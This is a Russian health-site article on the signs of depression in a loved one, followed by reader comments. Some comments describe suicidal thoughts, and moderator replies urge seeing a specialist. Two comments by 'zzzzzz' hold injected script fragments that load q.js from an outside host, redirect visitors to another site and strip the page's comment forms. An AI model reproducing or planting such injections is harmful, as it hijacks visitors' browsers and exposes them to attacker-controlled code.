Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Признаки депрессии у близ...  >>  Признаки депрессии у близкого человека
 
Обратная связь
 

Признаки депрессии у близкого человека

Размер шрифта
10 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Алла Пилунова
Здоровье инфо
  • google_analytics: false
  • Нравится

Зная ключевые признаки депрессии, вы сможете распознать эту серьезную проблему у своих близких, друзей и родственников. А значит, поможете им вовремя обратиться за помощью.

депрессия

Простая подавленность, грусть и настоящая депрессия – совсем не одно и то же. А отличить депрессию от обычной печали или даже усталости бывает очень непросто. Порой для этого приходится обращаться к специалисту (психологу или даже врачу-психиатру), поскольку настоящая депрессия – это болезнь, и требует лечения. Поэтому так важно знать некоторые признаки, которые дадут вам понять, что у вашего близкого человека действительно депрессия.

Апатия и негатив – первые симптомы депрессии

Потеря интереса к жизни, постоянная подавленность, негативный настрой, унылое настроение – первые вероятные признаки наступления депрессии. В таком состоянии человек ощущает себя «опустошенным», пропадают все положительные эмоции.

Если близкий человек утратил «вкус к жизни» и, по вашему мнению, перестал ей радоваться, следует подумать о том, чтобы обратиться за помощью. Характерна для этого заболевания и потеря возможности получать удовольствие от того, что раньше приносило человеку радость. Например, больного вдруг перестает интересовать любимое хобби, он отказывается от сексуальных отношений, не общается с друзьями и т. п.

Обреченность и безнадежность

Еще одним характерным признаком депрессии является постоянно гложущее больного чувство вины. При этом человек не способен избавиться от ощущения, что все в его жизни идет не так. И, конечно, виноват в этом только он сам. Если вы регулярно слышите от кого-то фразы «у меня нет выбора», «ничего не получится», «это безнадежно» – вероятно, у него развивается депрессия. Как следствие у человека могут появиться мысли о суициде или членовредительстве. И к этим симптомам депрессии следует относиться особенно серьезно.

«Глаза на мокром месте»

Некоторые люди от природы плаксивы – слезы выступают в любой ситуации, вызывающей даже минимальные эмоции. Но это свойство проявляется и в плохие, и в хорошие моменты, человек плачет и от горя, и от радости. Депрессия же делает больного не просто плаксивым – слезы текут без какой-либо причины.

Впрочем, многие психиатры полагают, что в депрессивном состоянии куда лучше плакать, чем держать все в себе, позволяя болезни разрушать человека изнутри. Со слезами выходят негативные эмоции, и депрессия у таких людей имеет более легкое течение и быстрее проходит.

Проблемы со сном и раздражительность

Не стоит думать, что депрессия проявляется только в виде постоянной хандры, апатии и безволия. Наоборот, нередко больные проявляют беспокойство и раздражительность.

Гиперактивность и неспособность расслабиться – тоже могут свидетельствовать о депрессии, как и проблемы со сном. Бессонница или же напротив – постоянная сонливость, неспособность выспаться, отдохнуть у близкого человека должны насторожить вас.

Нарушения аппетита

Снижение аппетита вплоть до полного отказа от еды – характерные симптомы депрессии. Часто больной просто забывает о необходимом приеме пищи, в результате развивается истощение, которое только усугубляет его состояние.

Другой крайностью при депрессии, связанной с едой, может быть «срыв» в булимию, когда больной начинает безудержно есть все подряд.

Проблемы с памятью и болевой синдром

Помимо этого, у депрессивных больных нередко проявляются нарушения умственной деятельности, которые внешне воспринимаются как слабоумие. Например, человек не может сложить «пять» и «тринадцать», забывает, как зовут его собаку, не выключает свет, покидая квартиру и т.п.

Наконец, нередко депрессия проявляется в виде алогичных болей. Например, человека мучают рези в животе, головные боли или необъяснимая тошнота. Постоянные жалобы на не связанные с конкретным заболеванием боли также должны насторожить родственников страдающего депрессией.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

10 сентября 2012 в 18:51

Цитировать   |   Пожаловаться

А как из этой депрессии выйти или излечиться?

Гость 10 сентября 2012 в 18:51
А как из этой депрессии выйти или излечиться?
 Наш материал называется "Признаки депрессии у близкого человека". 
Обратите внимание на разницу в главной мысли статьи и Вашем вопросе. 

Самому себе поставить диагноз и назначать лечение НЕЛЬЗЯ. Вам предлагается обратить внимание на близкого человека и помочь ему вовремя получить помощь специалиста. 
Если Вам кажется, что все сказанное в статье относится к Вам лично, то это бесспорный повод посетить доктора соответствующей специальности и разобраться. 

3 - Гость

26 сентября 2012 в 20:32

Цитировать   |   Пожаловаться

я мучаюсь от вышеописанного состояния уже несколько месяцев (не впервые). Родственники и парень только называют ленивой занудой и читают морали что так жить нельзя. С друзьями не общаюсь. К специалисту идти нет ни денег, ни желания, ни доверия и родным будет лишний повод загнобить. мысли о суициде пока только как сарказм... Пожалуйста помогите или добейте. мне же всего 23...

Гость 26 сентября 2012 в 20:32
я мучаюсь от вышеописанного состояния уже несколько месяцев (не впервые).
 

!!
Если Вам кажется, что все сказанное в статье относится к Вам лично, то это бесспорный повод посетить доктора соответствующей специальности и разобраться. 

5 - Гость

01 ноября 2012 в 08:42

Цитировать   |   Пожаловаться

в депрессии уже 2 года ухожу все дальше иногда хочется убежать ото всех иногда суицид главное пытаюсь найти выход а вижу только плохое видимо это уже психушка


Гость 01 ноября 2012 в 08:42
видимо это уже психушка
 Вам действительно стоит обратиться к специалисту. "Психушка" - неправильный термин, пренебрежительное  отношение говорит о незнании проблемы, это выражение недалеких людей. 
Заболевание души ничем не отличается от заболевания рук, спины, живота, головы. .. и.т.д. 
К тому же заболевания эти существуют столько, сколько существует человечество, во всем мире. И будут существовать ВСЕГДА. 
Стоит тратить хорошее время на депрессию? Не тяните время, обратитесь к специалисту. Если есть друзья или близкие люди, попросите, чтобы  Вам помогли найти специалиста, обозначили время, адрес и.т.д. Вы увидите, что это вовсе не так трудно. Гораздо труднее эта постоянная борьба с собой. 

7 - Гость

24 марта 2015 в 20:01

Цитировать   |   Пожаловаться

По-моему это у меня хронически и воспринимаю уже как  обычное и нормальное состояние ...

8 - zzzzzz

30 июня 2015 в 21:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

9 - zzzzzz

30 июня 2015 в 23:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сладкие газировки вызывают депрессию   Причины депрессии, о которых вы не подозревали. Часть 1   Ботокс – спасение от депрессии   Кошки – причина суицида?!  
01 апреля 2013Сладкие газировки вызывают депрессию 01 февраля 2013Диагноз «шизофрения» можно поставить по движению глаз
 
31 января 2013От чего зависит время и можно ли им управлять 17 октября 2012Гормон оргазма поможет прочесть мысли
 

Слайдшоу

1
Мифы и факты о депрессии
Вся правда о депрессии
10 вещей, которые вам нужно знать об антидепрессантах

Тесты

Что вы знаете о депрессии?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.